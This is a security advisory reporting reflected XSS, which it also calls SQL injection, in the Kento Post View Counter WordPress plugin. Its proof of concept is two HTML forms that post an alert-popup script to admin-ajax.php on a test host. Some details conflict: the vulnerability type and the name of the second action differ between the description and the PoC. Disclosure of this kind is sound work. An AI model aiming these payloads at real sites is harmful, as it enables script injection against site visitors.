Kento Post View Counter [Reflected XSS]

Description

WordPress plugin Kento Post View Counter Plugin is vulnerable to SQL Injection attacks.

The plugin registers an AJAX actions

1. kento_pvc_top_geo
2. kento_pvc_top_referer

which are available to nor registered users also.

Vulnerable params are

1. $_POST['kento_pvc_geo'] for kento_pvc_top_geo action
2. $_POST['kpvc_date_referer'] for kento_pvc_top_referer action

Action kento_pvc_top_geo and can be exploited for SQL injection also (DWF-2016-87021).

PoC

<p>Action: kento_pvc_top_geo</p>
<form action="//wp1.dev/wp-admin/admin-ajax.php" method="post">
    <input type="hidden" name="action" value="kento_pvc_top_geo">
    <input type="hidden" name="kento_pvc_geo" value="<script>alert(String.fromCharCode(88, 83, 83))</script>">
    <button type="submit">Press Me</button>
</form>

<p>Action: kpvc_date_referer</p>
<form action="//wp1.dev/wp-admin/admin-ajax.php" method="post">
    <input type="hidden" name="action" value="kpvc_date_referer">
    <input type="hidden" name="kpvc_date_referer" value="<script>alert(String.fromCharCode(88, 83, 83))</script>">
    <button type="submit">Press Me</button>
</form>

---

WordPress Plugins Reflected XSS

---

INFO

• 19 April 2016
• Pan Vag
• kentothemes.com
• Kento Post View Counter
• WordPress 4.5
• DWF-2016-87022